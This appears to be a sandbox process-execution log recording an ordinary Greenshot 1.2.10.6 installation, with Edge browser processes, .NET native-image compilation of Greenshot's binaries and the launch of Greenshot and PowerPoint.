"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1740,2460168577395196869,5417546639643773096,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2952 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1740,2460168577395196869,5417546639643773096,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5632 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1740,2460168577395196869,5417546639643773096,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6152 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1740,2460168577395196869,5417546639643773096,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6468 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1740,2460168577395196869,5417546639643773096,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6380 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1740,2460168577395196869,5417546639643773096,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6732 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1740,2460168577395196869,5417546639643773096,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6456 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1740,2460168577395196869,5417546639643773096,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4992 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1740,2460168577395196869,5417546639643773096,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=2020 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1740,2460168577395196869,5417546639643773096,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6700 /prefetch:8
C:\Users\Admin\Downloads\Greenshot-INSTALLER-1.2.10.6-RELEASE.exe
"C:\Users\Admin\Downloads\Greenshot-INSTALLER-1.2.10.6-RELEASE.exe"
C:\Users\Admin\AppData\Local\Temp\is-CFM2T.tmp\Greenshot-INSTALLER-1.2.10.6-RELEASE.tmp
"C:\Users\Admin\AppData\Local\Temp\is-CFM2T.tmp\Greenshot-INSTALLER-1.2.10.6-RELEASE.tmp" /SL5="$180258,1293027,131584,C:\Users\Admin\Downloads\Greenshot-INSTALLER-1.2.10.6-RELEASE.exe"
C:\Users\Admin\AppData\Local\Temp\is-RCUTO.tmp\_isetup\_setup64.tmp
helper 105 0x48C
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe" install "C:\Program Files\Greenshot\Greenshot.exe"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 1ec -InterruptEvent 0 -NGENProcess 1dc -Pipe 1e8 -Comment "NGen Worker Process"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 1dc -InterruptEvent 0 -NGENProcess 204 -Pipe 1ec -Comment "NGen Worker Process"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 2b4 -InterruptEvent 0 -NGENProcess 2a0 -Pipe 2a8 -Comment "NGen Worker Process"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 2a0 -InterruptEvent 0 -NGENProcess 2f4 -Pipe 2f8 -Comment "NGen Worker Process"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 2a0 -InterruptEvent 0 -NGENProcess 204 -Pipe 2b4 -Comment "NGen Worker Process"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 2a0 -InterruptEvent 0 -NGENProcess 1dc -Pipe 2e8 -Comment "NGen Worker Process"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 2a0 -InterruptEvent 0 -NGENProcess 1e4 -Pipe 2ac -Comment "NGen Worker Process"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 2fc -InterruptEvent 0 -NGENProcess 1e4 -Pipe 1dc -Comment "NGen Worker Process"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 2ec -InterruptEvent 0 -NGENProcess 2e0 -Pipe 300 -Comment "NGen Worker Process"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 2ec -InterruptEvent 0 -NGENProcess 2f4 -Pipe 2a4 -Comment "NGen Worker Process"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe" install "C:\Program Files\Greenshot\GreenshotPlugin.dll"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 1ec -InterruptEvent 0 -NGENProcess 1dc -Pipe 1e8 -Comment "NGen Worker Process"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 298 -InterruptEvent 0 -NGENProcess 1ec -Pipe 290 -Comment "NGen Worker Process"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 274 -InterruptEvent 0 -NGENProcess 28c -Pipe 27c -Comment "NGen Worker Process"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 29c -InterruptEvent 0 -NGENProcess 28c -Pipe 2a0 -Comment "NGen Worker Process"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 2b4 -InterruptEvent 0 -NGENProcess 2ac -Pipe 294 -Comment "NGen Worker Process"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 278 -InterruptEvent 0 -NGENProcess 29c -Pipe 1dc -Comment "NGen Worker Process"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 28c -InterruptEvent 0 -NGENProcess 2b4 -Pipe 2b8 -Comment "NGen Worker Process"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 2b4 -InterruptEvent 0 -NGENProcess 288 -Pipe 28c -Comment "NGen Worker Process"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 2b4 -InterruptEvent 0 -NGENProcess 2ac -Pipe 29c -Comment "NGen Worker Process"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 29c -InterruptEvent 0 -NGENProcess 1ec -Pipe 2a8 -Comment "NGen Worker Process"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 29c -InterruptEvent 0 -NGENProcess 278 -Pipe 284 -Comment "NGen Worker Process"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 2b4 -InterruptEvent 0 -NGENProcess 2c4 -Pipe 29c -Comment "NGen Worker Process"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 26c -InterruptEvent 0 -NGENProcess 2d0 -Pipe 2a4 -Comment "NGen Worker Process"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://getgreenshot.org/thank-you/?language=en&version=1.2.10.6
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x120,0x124,0x128,0xfc,0x12c,0x7ffa741d3cb8,0x7ffa741d3cc8,0x7ffa741d3cd8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1856,7499645959545272157,11855202910463826490,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1860 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1856,7499645959545272157,11855202910463826490,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2196 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1856,7499645959545272157,11855202910463826490,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2540 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1856,7499645959545272157,11855202910463826490,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3332 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1856,7499645959545272157,11855202910463826490,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3340 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1856,7499645959545272157,11855202910463826490,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4860 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1856,7499645959545272157,11855202910463826490,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3916 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1856,7499645959545272157,11855202910463826490,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3744 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1856,7499645959545272157,11855202910463826490,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4324 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1856,7499645959545272157,11855202910463826490,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5700 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1856,7499645959545272157,11855202910463826490,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2952 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1856,7499645959545272157,11855202910463826490,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3732 /prefetch:1
C:\Program Files\Greenshot\Greenshot.exe
"C:\Program Files\Greenshot\Greenshot.exe" /language en
C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1856,7499645959545272157,11855202910463826490,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5820 /prefetch:8
C:\Program Files\Greenshot\Plugins\GreenshotOCRPlugin\greenshotocrcommand.exe
"C:\Program Files\Greenshot\Plugins\GreenshotOCRPlugin\greenshotocrcommand.exe" -c
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xe0,0x10c,0x7ffa741d3cb8,0x7ffa741d3cc8,0x7ffa741d3cd8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1880,17437531230394570270,7119659543817770296,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1944 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1880,17437531230394570270,7119659543817770296,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2092 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1880,17437531230394570270,7119659543817770296,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2748 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1880,17437531230394570270,7119659543817770296,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3428 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1880,17437531230394570270,7119659543817770296,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3440 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE
"C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1880,17437531230394570270,7119659543817770296,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4380 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1880,17437531230394570270,7119659543817770296,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4448 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffa741d3cb8,0x7ffa741d3cc8,0x7ffa741d3cd8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2016,15691241621969825166,14767883264428024423,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=2028 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2016,15691241621969825166,14767883264428024423,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2080 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2016,15691241621969825166,14767883264428024423,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2796 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2016,15691241621969825166,14767883264428024423,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3392 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2016,15691241621969825166,14767883264428024423,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3416 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2016,15691241621969825166,14767883264428024423,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4908 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2016,15691241621969825166,14767883264428024423,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4864 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=2016,15691241621969825166,14767883264428024423,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4884 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2016,15691241621969825166,14767883264428024423,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5228 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2016,15691241621969825166,14767883264428024423,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5344 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2016,15691241621969825166,14767883264428024423,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5320 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2016,15691241621969825166,14767883264428024423,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4964 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2016,15691241621969825166,14767883264428024423,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5440 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
